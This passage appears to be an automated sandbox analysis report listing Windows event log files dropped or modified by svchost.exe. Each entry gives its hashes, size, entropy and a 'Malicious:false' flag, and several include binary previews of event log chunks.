                                        SHA-256:29302E33B11EBCBC0560A52847583AE37F2A2A72976A23F4AD71393E4FEBDBD4
                                        SHA-512:E0F1B9B471A40FC848A124DD0261FBC66B82FF3D9CC0DD655C8A6E2D9FBEEF0B9E1070D424589D8C3A57E0976A62B00AFC5BDF8B716B9D05DA5BE97B7B698AB5
                                        Malicious:false
                                        Process:C:\Windows\System32\svchost.exe
                                        File Type:MS Windows Vista Event Log, 2 chunks (no. 1 in use), next record no. 130, DIRTY
                                        Category:dropped
                                        Size (bytes):70168
                                        Entropy (8bit):4.522804099045985
                                        Encrypted:false
                                        SSDEEP:768:gWYwLMrDWYwLMrWEQ8QtnkVKRNlY20sMY3Dp13/n/ydIxm6g/ZSi+uQ/NujMAEWC:Tp
                                        MD5:50F25C4C4C56F033FAF529180FA1361D
                                        SHA1:AA7BC663AD2C4B29D1C01A87F1D2FEAAAF5D13CC
                                        SHA-256:5E5365809AAAC7334E7F1DB52B2CB85F6848A0A2FAE520598662C5CE2D381600
                                        SHA-512:F352029BA9C3DF502354FEC260E090BEEBF4A0BFADF56CD20F9FA1AE0A38B86FA3CAEE1743C87896DF5CA658A7783402D8FE1A2E5DBCB960973362FD6F03A815
                                        Malicious:false
                                        Process:C:\Windows\System32\svchost.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):74072
                                        Entropy (8bit):5.6718697150717405
                                        Encrypted:false
                                        SSDEEP:384:ua5q29o2KDzyzIzba5WzuzNz0zxzuewKWMK5a5LhAa5DpzuzNz0zxzuewKWMKFNN:bO0QqjaXI6AlcrwZ0
                                        MD5:21AAFAB24805605491920463D78C08CB
                                        SHA1:FC4932961993965CF4297FA60ECC75D605503AC6
                                        SHA-256:02E08CEDB37B351504AF8511E631AE8CFEC26DF9E9779D74C487E9DABE634EC1
                                        SHA-512:6CEF1E9FC88A035AA00BA197385FE1D61678541133BD5257E05BBB307777AD473E346C8DFA4D6F76AF0B3A31B9094AE9CBE98DFEE73CE8A19524EDDBCCEF3610
                                        Malicious:false
                                        Process:C:\Windows\System32\svchost.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):65536
                                        Entropy (8bit):1.0906234381604036
                                        Encrypted:false
                                        SSDEEP:384:1h1hM7MpMEaMWFMu/Ma2M+AMmGM1cMNF3Mg9Ml7MABMczM0cMKhMOrMM/uMZeiMa:1eJw
                                        MD5:C5FF06DD8BE524B616F8663522CECD8F
                                        SHA1:C4103F0987D75AFE225436B8039C57F7CE40BDBA
                                        SHA-256:BE9EA2824B5985A8CA71792C629FCBAD2FE3267613E560F55512E1439F8D89DC
                                        SHA-512:2839A4B7356AA30DEA18794D81C10A81D4CB79C76380681EEBA6427D843DED6BB0A0B37AAA4AAF7715DE4C31DA9D30DFC1CF70F662E83B29CE8DC24EF1522DB3
                                        Malicious:false
                                        Process:C:\Windows\System32\svchost.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):65536
                                        Entropy (8bit):4.3544648067172504
                                        Encrypted:false
                                        SSDEEP:384:chz1g1z1f1m51F1Z191f181L1tY1VGm1Q1L1p1VG1U1Z1s1VA141c1Vc1q1tS10r:c2jdjP0cs5uP/ub
                                        MD5:5E01D7C4731FBE5625EEC0680D1037F1
                                        SHA1:F5889D115B9E5869538E908EFFD8B28A0BB72462
                                        SHA-256:73D8518E4715F852C806A157EAD1506A36AABF4BDE478DCEFF96A84D81E27AE6
                                        SHA-512:1FC15D0D1B817E648209CC72E14EDBFCBC8CC827C70DAE75D8C8A5465927BDBD6142D73F203F3240D259F38A2451E555D763D07BA10F5CA47B200733AD37CC1C
                                        Malicious:false
                                        Process:C:\Windows\System32\svchost.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):65536
                                        Entropy (8bit):3.2141136432953736
                                        Encrypted:false
                                        SSDEEP:384:KzhDIEQAGxIHIFIWbIfEITOIHI2IjWWIfEITFIrIPIhIwItIFFIf1ITMsVIfIMIt:KzZxGq00U57
                                        MD5:C812FAD5A52C2B87870EB0463096097F
                                        SHA1:CEB4BE4FD9F07420C253E3A7879CCB02C68F864D
                                        SHA-256:401A6D6FB8BF407738B9369097CF34576832C6EC188A5C41B95FCCF00B90B58B
                                        SHA-512:CF6BB8CB98EBE26164A50D7728E3ABDA6C7E77A94F6E597C03F81E97DE58749DD96530EEDD1D1FC42E8FF68BBDEEA9951AA80E2985B15F8E3737A45D32165EF3
                                        Malicious:false
                                        Process:C:\Windows\System32\svchost.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):65536
                                        Entropy (8bit):0.8285527879711732
                                        Encrypted:false
                                        SSDEEP:384:G2h6iIvcImIvITIQIoIoI3IEIMIoIBIbIlMI2I5IEFIzI5I:G2oxOT
                                        MD5:B980C446A2A107517F87CF34ADC83DD9
                                        SHA1:ECCBF6BD7A62E3914DA365893A1AA6D8DDD920CD
                                        SHA-256:CB0BF585620C448F0695AC37A7FFF2A358AED302660B31901C2D060921721FFB
                                        SHA-512:B2732AFC5D98033D990944E61930C3EA57D2ACFEE4A802476721665D7711FA2E9FEDCD7647917FE95AE03CDDC5DD927FA55F08F35CDEFA62EDC7CFD3C7FB5A39
                                        Malicious:false
                                        Process:C:\Windows\System32\svchost.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):65536
                                        Entropy (8bit):3.1037290630380294
                                        Encrypted:false
                                        SSDEEP:768:n4u1n8zfFFU1x4Dk13xIb13xIb13xIt13xIi13xI513xIU13xI013xIF13xIH13K:d
                                        MD5:7C3D15939EC70328CB06DAA08EA22573
                                        SHA1:BDA43799C74C483842C457E23EAAD47A136C976C
                                        SHA-256:5CA7B9E56E9708ED4F32F7C0BF086BF107C4A8AE7DBCE974FEB8AF9501D23902
                                        SHA-512:7875BC899CCEC1F62AD34E73A9F61D588BD6A98C2F768FB01FF1865B272FD8337DC15E6B5B18DB9B11DF565C543E2F329A784F73C3CF333B0F526E9F47021A58
                                        Malicious:false
                                        Process:C:\Windows\System32\svchost.exe
                                        File Type:data
                                        Category:modified
                                        Size (bytes):81472
                                        Entropy (8bit):3.983900909840639
                                        Encrypted:false
                                        SSDEEP:768:orlJutDBjV8k+z7eUtHpoVWWqPcRkpHrWbGyYKQc90XZ07SZRcZv76NcRUjGHzLB:4utDBjV8k+z7PtHpoVW7k
                                        MD5:051C8670C54D1862D130D6F69FBC193C
                                        SHA1:2C1E88FE9EDD2E9C8F222E57DC36367F26E9AF72
                                        SHA-256:141CD60E0C8064392043B27EB008D280CE5DB3C08B4C4677CDB5EDF98F147E29
                                        SHA-512:9CB41018FD0040EAA5E406019A195DDFFE44672E8A77E3D61D8E4BA59D1A9273254E6EECAFE0EF1DE3E870712C797B7F8AA9455977F3EE6FF9538565551317E9
                                        Malicious:false
                                        Process:C:\Windows\System32\svchost.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):65536
                                        Entropy (8bit):4.639996114613263
                                        Encrypted:false
                                        SSDEEP:384:ShsKhoKxK2KIKnKpkMK0KtKPKtK3LKXmKZKaK2KVKKK3KAKwKwKiKVKyKGKpKVtt:SFb5pORi7mEFZqZl+pNcg6E3wr/5O
                                        MD5:B2FB71BE84D5955903D003AD082AEC6B
                                        SHA1:061B39081A483E2724A670FF33630605A669A8A9
                                        SHA-256:865240FB621D235E7A3FA0800470123685F7F70CF653D307EE458EBD8EEC6410
                                        SHA-512:14D89B65D6F5C833388C7DEC81DC24D0FDC76CA434A9F910B019AF1370BF323FC7C6ACF4606A182F8A968E0553F7D42FB2B1B7D4EB643962330CC62B63495FC0
                                        Malicious:false
                                        Preview:ElfChnk.............................................T.......................................................................&.,................t...........................=...........................................................................................................................f...............?...........................m...................M...F........................!..................7>..&...w...........M.../5..G........%...................................a..OL......OF...............I..**.................W..........Z7;&........Z7;..T.f.m`..L........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                        Process:C:\Windows\System32\svchost.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):65536
                                        Entropy (8bit):0.7906584955348045
                                        Encrypted:false
                                        SSDEEP:384:MhP8o8Z85848V8M8g8D8R8E8y8JB8M848r898:MN
                                        MD5:4581429C5AA67A59E35288D5B0B55942
                                        SHA1:F0B9983D5700F829CBB975F501FBA322F5522593
                                        SHA-256:DEDCEFB3F18D3B36D8D27631F4DF73637937BF907FB1EB891CCEA1C14C19F44D
                                        SHA-512:96E95B4DA3F900B38F6B53121AA9C142B85242F3C287233D93B191CE08C1E89280FAAA52A6EEFFE0E04ED282CD6374AF8286E2C905004C651AAC78FFEAEF7E19
                                        Malicious:false
                                        Preview:ElfChnk.....................................8!..."..V.1.....................................................................8..Z........................................V...=...........................................................................................................................f...............?...........................m...................M...F...............................................v...........&.......................................................................................**..(.............................&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                        Process:C:\Windows\System32\svchost.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):65536
                                        Entropy (8bit):3.7668614069217146
                                        Encrypted:false
                                        SSDEEP:1536:kXhfUyS+z1VV18o838c8bUc8cVVsz8VX8SoX8aA8cmtpjAiVB18dwE4vjcYoMjn1:kXZnS
                                        MD5:A5BD277E74EB6F1062F6F6529CD4B41C
                                        SHA1:A979788C15B6992F30511279C3E988DD4B2A8A9D
                                        SHA-256:1AF918437E2BB3A56F2167692178D0700A451951BC7EFDB8652741C6DA539228
                                        SHA-512:65FB0FA1C51AF32B3A927DF40E691672A304DDE9F43FAAAE97D40EA6BD15C60E1AA8F9F36B6F82AF6C283BCBE353E154D38DF183E8956369D816210FD3842262
                                        Malicious:false
                                        Preview:ElfChnk.........(...............(............J..xL...[.E....................................................................?...................v...........................=...........................................................................................................................f...............?...........................m...................M...F................................................9..........&...............................................................O.......................**..............g5...............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                        Process:C:\Windows\System32\svchost.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):65536
                                        Entropy (8bit):2.551634567387031
                                        Encrypted:false
                                        SSDEEP:768:L0VsLY/Z5aFka2aKazzabCafama5Sa0ra6rzaJcavkao9O6aGyRvF5UN5325Oi5Z:RcEN
                                        MD5:9FE9303D437AE64AE7D6F84406623E46
                                        SHA1:A7CE105D08F7A28F815B5BF171B3EDEB56E5CFF5
                                        SHA-256:81E629C26EF40A78C5E60E749498BE53744A0D618273BE5AF3DA048009D7345C
                                        SHA-512:F08582C238A2B6E2257F16B30DB0D407980129438D57099E92CA9FDE99A55B84B814FBDEC73A164B4A5BB792906AE2C5C88E63FA71FBDA472276B3CAE68C4CC9
                                        Malicious:false
                                        Preview:ElfChnk.........C...............C...................<b......................................................................-..s................Q...........................=...........................................................a...............................................................f...............?...2...........................................M...F...........................*...........&........b..................................................%_..........................]...................**.............._.............X..&.......X...],T.'tB..E........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                        Process:C:\Windows\System32\svchost.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):1912
                                        Entropy (8bit):3.6274601279081162
                                        Encrypted:false
                                        SSDEEP:48:MUiWmUTJCKOrCK3QKB69DyT0zCKOrCK3QkkcqrF+:6UTJCKOrCKg669DyT0zCKOrCKgkkcGF+
                                        MD5:63A0FEF70C45CDDECCB42CF0B1EEAA1B
                                        SHA1:287529BC38DA37EC6856DF8DA6077DE6B7922BE6
                                        SHA-256:21E99D1A37EE8F86193CD1A523DBA194C552C8A98DA0A16196662DC5DAA16BF0
                                        SHA-512:CF1AF456E1CC2BEFACDE22662C5859C40201230C68ED0C8DBB42F3EB7135D606BB3126844E3DDB3EBCC2AE4724DF5BDEA3B3F49263855B8E8ABD0E4F219DB8D1
                                        Malicious:false
                                        Preview:ElfChnk.'.......8.......'.......8...........pv..`y...NI.........................................................................................\...........................=...........................................................................................................................f...............?...........................m...................M...F...........................................5...&...................................................................................................**......7........d=q...........Z7;&...............................................................L.......b.....!..................d=q....}QH..8D....5...d...t...7....................M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.S.e.c.u.r.i.t.y.-.M.i.t.i.g.a.t.i.o.n.s........J...M..<.M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.S.e.c.u.r.i.t.y.-.M.i.t.i.g.a.t.i.o.n.s./.K.e.r.n.e.l.M.o.d.e...!..^5...........h.......>...................................4.\.D.e.v.i.c.e.\.H.a.r.d.d.i.s.k.V.o.l.u.m.e.3.\.W.i
                                        Process:C:\Windows\System32\svchost.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):65536
                                        Entropy (8bit):4.327219596727842
                                        Encrypted:false
                                        SSDEEP:384:Npa/hDGCyCkCzCRCFC0CPCqiCEBCzMCy2zCoFC9CKCPCryCaC6CyCU2sF2s2EY2L:Npa/dUwmgU
                                        MD5:39BDE2B4C029E5F2BC6FA244100ED55C
                                        SHA1:EE71625A1DDB5D57B606677AB384B794C2F76741
                                        SHA-256:DACAB8704BF60ED925B8F231A45A4F5A1CA9C87DED892940B518EACA1CDEE266
                                        SHA-512:909A4CE0385AD7D2936C2F73E69F20DFC438304778826AAAE9CEC176E1E10900557A6621608F7CA782CF5B098B98E195AAC432739F81112B12DEF9C0547BD50C
                                        Malicious:false
                                        Preview:ElfChnk.U...............U...........................y.6R....................................................................?...................F.......................n...=...........................................................................................................................f...............?...........................m...................M...F............................H..................f,..........&................................................x..............is......................**..0...U.........Df..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                        Process:C:\Windows\System32\svchost.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):65536
                                        Entropy (8bit):4.4645121501987095
                                        Encrypted:false
                                        SSDEEP:1536:PrGJSsWdeBDBvwdvx8j00lDL0MBqQtcgVSyCV78AhurLyt2Q4eW+WzpzXepPvMog:PrGJSsWdeBDBvwdvx8j00lDL0MBqQtcU
                                        MD5:AF6B3AF3FEB5952B5CFA4A79A418228D
                                        SHA1:56B7AED9FC54B88B43EDEBBF35599F58610D3488
                                        SHA-256:4C33B557190EB5E003E3537736BEC0EB3B39A6435797B3B2E0B0440F25283A3A
                                        SHA-512:52F7304D50D66DDCF4B936F1089E8A6A56E5BD67037F6991D70A3DF6161C23F7A9D9954648CD4688EAA96ED45D4310822CB3107389B89244E9BC45340A90C98A
                                        Malicious:false
                                        Preview:ElfChnk......................................d..hf..........................................................................H.".................6.......................^...=...........................................................................................................................f...............?...........................m...................M...F...............................................&...................................................................................................**................G.S..........Z7;&........Z7;..T.f.m`..L........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                        Process:C:\Windows\System32\svchost.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):65536
                                        Entropy (8bit):4.443690249971798
                                        Encrypted:false
                                        SSDEEP:1536:WM9QuTOc99zPb+zEbINH90Z5kLnOE8EGmwAOXKbGKszQW3XnT04Z6E2nhctHWkw1:WM9QuTOc99zPb+zEbINd0Z5kLnOE8EG4
                                        MD5:B64381690CED676B2065D76EC2079905
                                        SHA1:BDE6781BD8808ECEBF75B84C796CFDA479A76CA5
                                        SHA-256:0F1298AE8D709F3D494B0BB0FE0E9978457CD8BD7F7A347C797406EB26C270D3
                                        SHA-512:6F2885F79B70492E096D3CC30010A4FBF0BB9613935846A67A3A3FDD982DCE4699201DDD4F7793203DE0D3DCF86D9905940A948AFA434BE473B449E0DF6DBA98
                                        Malicious:false
                                        Preview:ElfChnk.........................................h.....m..................................................................../d..................6.......................^...=...........................................................................................................................f...............?...........................m...................M...F........................................................................................................i..........A....g..1c...............k......**..............@v.YW..........Z7;&........Z7;..T.f.m`..L........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                        Process:C:\Windows\System32\svchost.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):65536
                                        Entropy (8bit):2.4123466903622734
                                        Encrypted:false
                                        SSDEEP:384:vhZ7o7c7r7t7Q7A767/7U7r7W7A777kJ7q747i7T7L7H7P7p7c7/7v7E7iw7p7O6:v
                                        MD5:788B6B13BF6B1506C42A647C90C608FB
                                        SHA1:83A1DF28AAA9431F8BA98910622AB433633D5269
                                        SHA-256:E544869EE0C5829D15D7BFAF95679A6FF09D069B2752870866479980D4DECE5B
                                        SHA-512:6EE60DEE5B9E36106D7A654D241BC8CE2C84FC5DC663C43E270207EB84E4A6419BE19E00CBC6B530A7760F297BC56466619F5F6D17D9D7B8578CA937D3AD044A
                                        Malicious:false
                                        Preview:ElfChnk.....................................Ps.. u...^......................................................................]bJ............................................=...........................................................................................................................f...............?...........................m...................M...F............................6...............1..k............................................................................4......................**..............|.FzT..........Z7;&........Z7;..T.f.m`..L........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                        Process:C:\Windows\System32\svchost.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):65536
                                        Entropy (8bit):2.3479804318728847
                                        Encrypted:false
                                        SSDEEP:384:Ghc+uaNuru+uhuKVuPJu5u9u4ufuTuxuDuvuDuOuXumui+udutui4uTAuFuauinw:G6Ovc0S5UyEeDgLcxq3gYi3
                                        MD5:20ABEDB128E5E464C3ADEDAFDD33AABD
                                        SHA1:008B5B5722E9F1C1FC3659745636DA9AC4BF3246
                                        SHA-256:E910DB6310307CE0E3D9AF315BB11B5118C3C82E2077D23CBB5204E604404D5F
                                        SHA-512:8710B94D7EA052FED9E34AAD859242ECAA44D2A21E7C4B8B3CE5BB0A38187D4F155981802A7EB34A931002BC9B841821EA4100F779EFAB52A9D95C69453352EC
                                        Malicious:false
                                        Preview:ElfChnk.........B...............B............v...x..........................................................................:m\.................,.......................T...=...........................................................................................................................f...............?...........................m...................M...F...........................&...................6^..................................................................w...............................**...............&3..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                        Process:C:\Windows\System32\svchost.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):65536
                                        Entropy (8bit):0.8478731703315486
                                        Encrypted:false
                                        SSDEEP:384:chGuZumutu4uEu5uOuDuyb2uPu1uxuMDpu++uwKuDou13u:cO
                                        MD5:59AB0335EB19F6DD54860AACB86FD9CB
                                        SHA1:3E8217D9EE7123F81F7C87F00C27CFD908350941
                                        SHA-256:98E01AC5F79731DBD6E6ED4F39DDFA1A61F4D84E06BCDE28EFEB53D2CA949BEB
                                        SHA-512:A1B8B98385ACE44DD5B0F9314B7B647609CE122081BD3B06FB66F0BDB0C0970BFA7D8FA87C73AB2586716AEEA2DF7D209D716A094217FF6F93F1DDFF89243AAE
                                        Malicious:false
                                        Preview:ElfChnk......................................$...&..6.5......................................................................./.................$.......................L...=...........................................................................................................................f...............?...........................m...................M...F...............................................>...........&.......................................................................................**..............Wy.8..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                        Process:C:\Windows\System32\svchost.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):65536
                                        Entropy (8bit):4.2240351571410395
                                        Encrypted:false
                                        SSDEEP:384:5hHAxA+AAVA3A0Al9ABtuAbuAbhAbxAboAb5TAbZAbPAU2AWAEAbAJAOhbArnAVT:5uG1mDNqd1ZjCRpazcYu2t
                                        MD5:38BC36F8F4362404E333E07569271DD3
                                        SHA1:A10D1ED540B714D7DEE9300C094DB58B0F4AD018
                                        SHA-256:A7B49B3228A919E34A01B00F9C71958A4391F9FC94EDB3BCA46088A94AA99D59
                                        SHA-512:2F730C5EE594ECF1B0F8E545940AA18E801E61F17CFBD44D8C99C6ADD80E5C29944F679439A7A9B9E855BBD6295A4F20D5B8BB638505E2F9CE660DF919B23019
                                        Malicious:false
                                        Preview:ElfChnk.........................................(...a.GR....................................................................LY..................:.......................b...=...........................................................................................................................f...............?...........................m...................M...F...........................Um..................&...m\...........................................S..........................................]W......**..................U..........Z7;&........Z7;..T.f.m`..L........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                        Process:C:\Windows\System32\svchost.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):65536
                                        Entropy (8bit):3.769029143659816
                                        Encrypted:false
                                        SSDEEP:384:4hnpg2TpJGpJfpJA3pJ9pJupJjpJkpJRpJapJfpJa5xpJxpJj+1pJQpJtpJAhpJT:45j5D+zAC
                                        MD5:20577B58222FB7BDEFC1300B21345286
                                        SHA1:AC97F48ACFF0FC27E1DA3A55C0322A9DF9ECB08A
                                        SHA-256:CDAC346E2CA13A1D8DE813E3574AD476A4071E25B8B4F919EBB24B38A0EF0C3A
                                        SHA-512:76B832469C31EE2EB6FCD6A5B96828BA84DA2FDEBC972E5C42092D71B61F932F0EB200F5B63BC1B41CA9E86536CFC7269FA909E90FB7899A206E3CD4F4DB15B1
                                        Malicious:false
                                        Preview:ElfChnk.7.......D.......7.......D............9...=...T.^................................................................................................................@...=...........................................................................................................................f...............?...........................m...................M...F...............................................&...................................................................................................**......7........qTUW..........Z7;&........Z7;..T.f.m`..L........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                        Process:C:\Windows\System32\svchost.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):65536
                                        Entropy (8bit):4.2293376553515465
                                        Encrypted:false
                                        SSDEEP:384:ZhtbpwV1pIvpLfpvQpw2pQYph15pcApLqBpJxTp0qo8psfp4yp4Rphe3p7PpLWBe:ZwDoh1VLHUO2hER7Mkf2q
                                        MD5:310A53947288CB6B830E117FED6CB431
                                        SHA1:9EF3CE4C8CF1C83613ADED2DFDEC20E886E9CA6D
                                        SHA-256:86C884F9E1E28CD0BE2F4B68DD247C8C76F9A2AA83EBD46A9B1380AF053A3D7F
                                        SHA-512:31F063C868A22CE873B40E3FC62661EACF67A5C0B40DD22412CF64924E7CA29CDF44317F5C8CD30524A5AD595531ACF71133943DDA072D81C07FEB62D0204521
                                        Malicious:false
                                        Preview:ElfChnk.\...............\............................N..........................................................................................*.......................R...=...........................................................................................................................f...............?...........................m...................M...F............................................;..^...........&...................................i...................................mS..............**..8...\........=..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                        Process:C:\Windows\System32\svchost.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):65536
                                        Entropy (8bit):1.2061151937932604
                                        Encrypted:false
                                        SSDEEP:384:YhwCCRzCaCkClCzCYC/CyCVCGCMCvC3CcvCCC7CaCqCEC:YKFz
                                        MD5:70E70D2CB97D613C0C3E1EA1D74EAA92
                                        SHA1:73F3C23087DB31711E0851550188FDDD6F11B59A
                                        SHA-256:CCDF6F2CA947C96970A0B63EEC1F8CCD753549B2FC6CED8E0C0AB54BEE2AE027
                                        SHA-512:F1900F302272A5319682D7E4B3AA8911DE337EB4059FEB97FB5DD4E25078CB961DEB49C8FF273C82693C3B5867FD9247ED3F2D22AAB5F9F9361BF0CC4004523C
                                        Malicious:false
                                        Preview:ElfChnk.....................................h6...8..3..........................................................................................V.......................~...=...........................................................................................................................f...............?...........................m...................M...F...........................&...................v)............................................................................................../...**..p............................&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                        Process:C:\Windows\System32\svchost.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):67536
                                        Entropy (8bit):4.425383792432925
                                        Encrypted:false
